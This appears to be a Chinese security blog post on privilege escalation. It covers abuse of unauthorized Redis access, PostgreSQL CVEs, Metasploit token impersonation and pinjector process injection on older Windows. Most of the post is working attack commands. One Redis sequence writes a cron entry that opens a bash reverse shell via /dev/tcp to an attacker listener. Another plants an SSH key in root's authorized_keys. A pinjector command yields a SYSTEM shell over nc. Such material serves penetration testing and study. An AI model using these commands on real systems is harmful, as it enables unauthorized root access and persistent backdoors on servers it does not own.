权限提升-Redis&Postgre&令牌窃取&进程注入Redis:

本文介绍通过Redis、PostgreSQL等服务的漏洞进行权限提升的方法,包括利用Redis服务反弹shell、写入SSH公钥直接登录服务器、利用PostgreSQL漏洞及令牌窃取、进程注入等技术。

权限提升-Redis&Postgre&令牌窃取&进程注入Redis:

利用计划任务执行命令反弹shell:首先利用redis未授权访问漏洞或者已知密码,登录redis服务,然后在root权限下利用redis内置命令进行反弹shell先在自己的服务器上监听一个端口 nc -lvnp 7999 然后执行命令: root@kali:~# redis-cli -h 192.168.63.130 192.168.63.130:6379> set xx “\n* * * * * bash -i >& /dev/tcp/192.168.63.128/7999 0>&1\n” OK 192.168.63.130:6379> config set dir /var/spool/cron/ OK 192.168.63.130:6379> config set dbfilename root OK 192.168.63.130:6379> save OK 写ssh-keygen公钥使用私钥登录:
利用条件:a.Redis服务使用ROOT账号启动b.服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器操作流程:Copy首先在本地生成一对密钥:root@kali:~/.ssh# ssh-keygen -t rsaCopy然后在redis执行命令192.168.63.130:6379> config set dir /root/.ssh/ OK 192.168.63.130:6379> config set dbfilename authorized_keys OK 192.168.63.130:6379> set x"AAAAB3NzaC1yc2EAAAADAQABAAABAQDKfxu58CbSzYFgd4BOjUyNSpbgpkzBHrEwH2/XD7rvaLFUzBIsciw9QoMS2ZPCbjO0IZL50Rro1478kguUuvQrv/RE/eHYgoav/k6OeyFtNQE4LYy5lezmOFKviUGgWtUrra407cGLgeorsAykL+lLExfaaG/d4TwrIj1sRz4/GeiWG6BZ8uQND9G+Vqbx/+zi3tRAz2PWBb45UXATQPvglwaNpGXVpI0dxV3j+kiaFyqjHAv541b/ElEdiaSadPjuW6iNGCRaTLHsQNToDgu92oAE2MLaEmOWuQz1gi90o6W1WfZfzmS8OJHX/GJBXAMgEgJhXRy2eRhSpbxaIVgx" OK 192.168.63.130:6379> save OK之后直接使用公钥登录即可低权限写webshellPostgresql:cve-2018-1058,cve-2019-9193令牌窃取:进行远程过程调用时请求提升权限,然后调用它从而生成特权安全令牌以执行特权操作。当系统允许令牌不仅用于进程本身,还用于原始请求进程时,漏洞就会出现。适用于win2008以及之前的版本。在msf集成有exploit,可以直接利用。use incognito #进入incognito模块list_tokens -u #列出令牌impersonate_token "DESKTOP-RMP8TTT\test"进程注入:每一个进程运行时的用户名(权限)不同,所以可以利用将进程注入到拥有高权限的进程后,以高用户权限执行。适用于win2008之前版本,不包括2008。
注入到system用户的进程,当管理员账户或其他账户注销后,后门仍然存在。可以理解为将pinjector注入到其他用户的进程里一起运行,进而同时拥有了对应的权限。

攻击过程
使用工具列出当前操作系统的所有进程

pinjector.exe -l

可以看到不同的进程对应不同PID和用户。

执行pinjector.exe -p 600 cmd 2345注入进程pid为600的进程,使用端口2345返回cmd,执行成功后在任务管理器里并没有多出进程。

使用kali的nc 192.168.70.135 2345

反弹shell并提权为system。

Windows2003&10进程注入提升
进程注入提权是本地提权方式的一种较为老的安全技术了,利用的是注入进程的所有者实现权限共享机制,这类技术主要利用在windows2008之前操作系统上.所以我们需要学习后续的本地提权更多的手法才能有针对高版本的系统。
pinjector进程注入工具针对-win2008以前操作系统
pexec64 32进程注入工具针对-win2008及后操作系统

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值